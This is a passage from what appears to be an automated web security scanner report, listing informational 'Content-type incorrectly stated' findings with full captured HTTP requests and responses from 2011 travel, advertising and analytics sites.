319f277e893cdd705cc459b97a9f26f4f8c39db8a788cebbd56b8dbbb3be102559f17ed51fcf3971853502735446a1a8e4e673c9e1afef64e03a50b1c5ac11b9d02a126640e6e99925fd9c093efb0b093fed00776fae8b6a234b859eda6ebf7ead2a428a2aed140bda22bd319549c4fb4abd4520f933fd05556a3e6d6ba22da703548b4e7dae33bf5d75dda5069cc291a5d21f7457fb554ad2f7406babc64b17db2a18a0c2519aacfd9326004520a2af2e8bb3be2e167b47e96610a60345f48d763bbc0a7dc4f7a39b47c9801dffaadd31a10763ef4d4edbab6edde4160908762feaf55d3b14e034a5c8f914aa5d955986e97282a3fa74e19cfc572e502f6bdf268576d8cef039bd66133d42aac8dd6f6058e280d61404400220b20e735a9a73667798fda7d646935c4d8acb985ea69f8b3f1a7d923def6aba934941b3dda9836064000a5977ed64124fb6efac5661506723c893c81099fd42d42a3267cb2bf376fb91ab003a639be54757e1a4521a98a0cc1919024fe93c16cc95d1cc3761f72590a6a2a2ee078c6e44d87f93480221b85202df07007d97d8a356e3f8fb1962e543a9f04feb0616791ad0125373ad059162a71bbf171f1b26df160876eaf9338caf44f170855d2286eedea1c59d22676858ef53fd11c1ab5a04c6265b369b6fcab8dbf743de1ab8aafaa608973f2f35bfdd8625668ef2bf523b1d91bcd7fbf58e05b67c28d8c4e00a0cbe7a0392ce7e474bc1b86b63b253cbbf302542253da8424ddf9440265015aff36dad47ae90fa3000df4d6

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/f6866c92a8364fce80a4ac8ec97ff3af0ab1a91f759648ddbe8945b1fbc2a0c691c542d898873efe10f7b76c498ddb47cc43ec556e608db660d2da235157b5b9128144e031cdcb7ce883bc49bd6f4730c072d8a321c7d52ad125718084660403740fb6f080029b901e51b24a6221c496ceb95bab942b3a694ac765383e98e433393622f9d9f17e931a8eda17a812d683a6150e4b01c1e0f9ef4d85dc205723703dd0fc6f4124ba9072e2cc09f47b21bb5e672212e3bf7da7533d15f6a230f3710ab161f7f7a5b2a5a252d0a6ba81833bf9f72e776e1b061e383a6b4ac8ad21981ede323ce029e217dc6b4d3a767b82ede1afb1656cb9c46328b4e42351722cb1d0d00694805d504d7ee408963b59c5a0893a5345fde273fc33c0e2ae6543d340c434db5f5259b7c7a5f2ab848cc79dbebf67b9d533ae620852ed6c1d8920d6a293dfe8f9455e3509c5743fc507676071657ae654d7e8d39b07d29e1dc0de2e4372f95c7dc69176950b55e8a6452d713c02b77c0fd34c5119312dffa7d3723ea65f04253b14909bdfcd742cdedd8463497ed70186343273d6a7dc38dd0afe739fd0e2de4758ed2f619fcd61a33f241c15d3272636c5796d73761aa33cfc4bc40be761eaed05ab54419f5c774db5deebc8e4833933c2af78df019a9a326c24e6a99661a26fc6eeedb21a699fcab31cfc38689c60f666b098b2dd24a10e2b2801ea302c1b98bcfa9e50e84f373b269d6d2f7c1b4d28cd72ffdefaf3568c918f5240b9d3a75973ad955ba1cf4ce1a6687430fbfe8f238d3e1d50bb3de38e9966513f7b8d9814cea014bbe91045a7b3d6f41e0c0f30fcd6136d2216784d7da050198f0ca45cff981d25dcec38e29ec2ceabcdc69d0af985a319f277e893cdd705cc459b97a9f26f4f8c39db8a788cebbd56b8dbbb3be102559f17ed51fcf3971853502735446a1a8e4e673c9e1afef64e03a50b1c5ac11b9d02a126640e6e99925fd9c093efb0b093fed00776fae8b6a234b859eda6ebf7ead2a428a2aed140bda22bd319549c4fb4abd4520f933fd05556a3e6d6ba22da703548b4e7dae33bf5d75dda5069cc291a5d21f7457fb554ad2f7406babc64b17db2a18a0c2519aacfd9326004520a2af2e8bb3be2e167b47e96610a60345f48d763bbc0a7dc4f7a39b47c9801dffaadd31a10763ef4d4edbab6edde4160908762feaf55d3b14e034a5c8f914aa5d955986e97282a3fa74e19cfc572e502f6bdf268576d8cef039bd66133d42aac8dd6f6058e280d61404400220b20e735a9a73667798fda7d646935c4d8acb985ea69f8b3f1a7d923def6aba934941b3dda9836064000a5977ed64124fb6efac5661506723c893c81099fd42d42a3267cb2bf376fb91ab003a639be54757e1a4521a98a0cc1919024fe93c16cc95d1cc3761f72590a6a2a2ee078c6e44d87f93480221b85202df07007d97d8a356e3f8fb1962e543a9f04feb0616791ad0125373ad059162a71bbf171f1b26df160876eaf9338caf44f170855d2286eedea1c59d22676858ef53fd11c1ab5a04c6265b369b6fcab8dbf743de1ab8aafaa608973f2f35bfdd8625668ef2bf523b1d91bcd7fbf58e05b67c28d8c4e00a0cbe7a0392ce7e474bc1b86b63b253cbbf302542253da8424ddf9440265015aff36dad47ae90fa3000df4d6 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-infinite-credit-card.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d05e2ee14; _wt.mode-79569=fcdcc722e93202f2ddfb

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=DF89E5BAA7A71BDFFD734919F4B8C6D8; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.76. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1710
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: pubfreq_26072_21044_1115692444=823-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAAAAAAAAAAAAAAAAAAA
...[SNIP]...
28.77. http://sr2.liveperson.net/hcp/html/mTag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sr2.liveperson.net
Path:   /hcp/html/mTag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /hcp/html/mTag.js?site=15744040 HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Location: http://sales.liveperson.net/lpWeb/default_ENT//hcpv/emt/mtag.js?site=15744040
Last-Modified: Sun, 18 Sep 2011 08:01:02 GMT
Accept-Ranges: bytes
ETag: "a24c01bd975cc1:2070"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 17382
Date: Mon, 03 Oct 2011 00:12:03 GMT
Connection: close

eval((function(s){var a,c,e,i,j,o="",r,t=".....................................................................................................................$@^`~";for(i=0;i<s.length;i++){r=t+s[i][
...[SNIP]...
28.78. http://survey.122.2o7.net/survey/dynamic/suites/332/hotelsallprod/list.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://survey.122.2o7.net
Path:   /survey/dynamic/suites/332/hotelsallprod/list.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /survey/dynamic/suites/332/hotelsallprod/list.js?1011730152590 HTTP/1.1
Host: survey.122.2o7.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; s_vi_x7Fhesx7Ebex7Ex7Fvx7Dx7Estrx7Ex7C=[CS]v4|2737302185161D3E-400001A26000301A|4E6EB475[CE]; s_vi_erx7Fillgdijg=[CS]v4|2737302185161D3E-400001A26000301C|4E6EB475[CE]; s_vi_nyhylx7B88x3F=[CS]v4|2737A31205158EF1-600001752000ED76|4E6F598F[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2737A31205158EF1-600001752000ED78|4E6F598F[CE]; s_vi_imx7Exxdnevx7Cx7Ech=[CS]v4|2737EACF051D3328-40000105A00A4E23|4E6FE0F9[CE]; s_vi_x7Ecgozoezfo=[CS]v4|273F763B851D0AD0-600001292004F341|4E7EEC75[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|273F778805160812-600001A3E03B8C61|4E7EEF10[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|273F778805160812-600001A3E03B8C63|4E7EEF10[CE]; s_vi_zocdx7Ex7Dhuyebx60h=[CS]v4|274278E405162358-400001A48009859F|4E84F1C7[CE]; s_vi_x7Cinsx7Fxxnjyhc=[CS]v4|274279178516188E-60000181A009BF0E|4E84F95C[CE]; s_vi_x7Cilgdijgnsx7F=[CS]v4|274278E405162358-400001A4800985A2|4E84F95C[CE]; s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|2742D7A185160C0B-400001A6403B49A6|4E85AF42[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E85AF42[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E85AF42[CE]; s_vi_x7Ecprx7Dtxxx7Fetcprexxgt=[CS]v4|2742D7B70516058E-400001A48011F125|4E85AF42[CE]; s_vi_ygx60kkvx7Ex7Ckx7Dx7Dmac=[CS]v4|2742E48905010BCD-60000105E03C302F|4E85D0A9[CE]; s_vi_fxxx7Fttx7Feydbxxpberx7Ex7C=[CS]v4|2742E48E850110C2-40000108003ACF53|4E85D0BA[CE]; s_vi_x60tndctw=[CS]v4|2742E89D05013772-4000010500433CF5|4E85D137[CE]; s_vi_x60tndahx60=[CS]v4|2742E89E85160D39-600001A48031365B|4E85D13C[CE]

Response

HTTP/1.1 200 OK
Server: Omniture DC/2.0.0
Last-Modified: Tue, 09 Aug 2011 15:45:20 GMT
ETag: "1680bd-37-7375a400"
Accept-Ranges: bytes
Content-Length: 55
Cache-Control: max-age=7776000
Expires: Mon, 07 Nov 2011 15:48:02 GMT
xserver: www337
Content-Type: application/javascript
Date: Mon, 03 Oct 2011 00:10:13 GMT
Connection: close

s_sv_globals.onListLoaded('','','','hotelsallprod',[]);
28.79. http://uxm.thousandeyes.com/rest/json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://uxm.thousandeyes.com
Path:   /rest/json

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /rest/json?data={%22aid%22:%2211%22,%22sid%22:%22D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408%22,%22r%22:265892,%22si%22:1,%22url%22:%22http://www.agoda.com/%22,%22ua%22:%22Mozilla/5.0%20(Windows%20NT%206.1;%20WOW64)%20AppleWebKit/535.1%20(KHTML,%20like%20Gecko)%20Chrome/14.0.835.187%20Safari/535.1%22,%22dlt%22:10244,%22clt%22:29183,%22dcl%22:37693,%22lt%22:37694,%22nt%22:0,%22rc%22:0,%22ft%22:2013,%22dt%22:0,%22ct%22:0,%22sct%22:null,%22rqt%22:2006,%22rpt%22:2,%22let%22:1,%22nl%22:1886} HTTP/1.1
Host: uxm.thousandeyes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:45 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref='/p3p/p3p.xml', CP='NOI NID HISa OTPa OUR UNRa BUS COM NAV'
Set-Cookie: _uxm_cid=D5E8C261-B1E7-4A8B-AEEE-A8B3463F3408; Domain=.thousandeyes.com; Expires=Tue, 02-Oct-2012 00:40:45 GMT
Vary: Accept-Encoding
Content-Length: 2
Content-Type: text/html

OK
28.80. http://www.agoda.com/js/MainTextSearch.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.agoda.com
Path:   /js/MainTextSearch.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/MainTextSearch.js?10.03.2011 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 20 Sep 2011 10:50:50 GMT
Accept-Ranges: bytes
ETag: "061c298377cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Date: Mon, 03 Oct 2011 00:38:35 GMT
Content-Length: 5704

...function trim(s)
{
   var l=0; var r=s.length -1;
   while(l < s.length && s[l] == ' ')
   {    l++; }
   while(r > l && s[r] == ' ')
   {    r-=1;    }
   return s.substring(l, r+1);
}

function doAlertTextE
...[SNIP]...
28.81. http://www.agoda.com/pages/agoda/default/page_traffic.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.agoda.com
Path:   /pages/agoda/default/page_traffic.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /pages/agoda/default/page_traffic.aspx HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
Content-Length: 0
Origin: http://www.agoda.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31; __utma=1.939961377.1317602256.1317602256.1317602256.1; __utmb=1.1.10.1317602256; __utmc=1; __utmz=1.1317602256.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 03 Oct 2011 00:38:10 GMT
Content-Length: 20
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate

10/3/2011 7:38:11 AM
28.82. http://www.agoda.com/pages/agoda/test/rendertime_techno.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.agoda.com
Path:   /pages/agoda/test/rendertime_techno.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /pages/agoda/test/rendertime_techno.aspx?x=1&z=20032 HTTP/1.1
Host: www.agoda.com
Proxy-Connection: keep-alive
Content-Length: 0
Origin: http://www.agoda.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.agoda.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=usyvurhj5s34qtup52oltx1d; agoda.version.02=CookieId=7523af68-b979-4a5c-9566-6cdf92488e9a&AllocId=7e8ed96e55a1afa44758a9a3548685a805d33aa9e52f062bd12dd4c14f0443858201818dc947029deb77f5ece1dfdd8b53ce5b4bcaab65f1374e65c5c00ce5341e3516961f3b6a770dff9a5728226b6f70b9ec62c57523af68b979a5c5666cdf92488e9a&TItems=2$1444075$10-03-2011 07:37$10-02-2012 07:37$; agodalbny=www.agoda.com_cluster_31; __utma=1.939961377.1317602256.1317602256.1317602256.1; __utmb=1.1.10.1317602256; __utmc=1; __utmz=1.1317602256.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Date: Mon, 03 Oct 2011 00:39:07 GMT
Content-Length: 20
Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate

10/3/2011 7:39:07 AM
28.83. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOO=opt-out

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 248
Date: Sun, 02 Oct 2011 23:58:59 GMT
Connection: close
Set-Cookie: TID=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: /ad22156.11567=,CFC,GFC; path=/
Set-Cookie: TData=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: CMS=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: CMP=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: __qca=1; path=/; expires=Mon, 04-Jul-2011 23:58:58 GMT; domain=.burstnet.com
Set-Cookie: /PC=0; path=/; expires=Sun, 09-Oct-2011 23:58:58 GMT
Set-Cookie: /SC=0-2vc.1; path=/


<!--
var cb = Math.random();
var d = document;
d.write('<script language="JavaScript" type="text/javascript"');
d.write('src="http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js?cb=
...[SNIP]...
28.84. http://www.cheaptickets.com/cacheable/empty.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cheaptickets.com
Path:   /cacheable/empty.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /cacheable/empty.html HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cheaptickets.com/shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660; JSESSIONID=E880BFD3C49D42E3; logging=E880BFD3C49D42E3||egapp2218p.prod.orbitz.net; curr=USD; BetaGroup="10/02/2011 19:37:33|B|A|C|C|C|H|B|P|A"; TrafficGroup="10/02/2011 19:37:33|P"; myTests=%3A%7C%3A%7C%3A%7C%3A%7C%3A%7CUBP_ErrorMessaging%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMjUzMjI3fEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzc6MzMgUE18IHwg; dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e33a3045525d5f4f58455e445a4a4217b9; mbox=check#true#1317602329|session#1317602268649-666039#1317604129

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 26 Sep 2011 15:42:24 GMT
ETag: "8-4adda015a1800"
Cache-Control: max-age=14400
Expires: Mon, 03 Oct 2011 03:55:56 GMT
Content-Type: text/html
Cteonnt-Length: 8
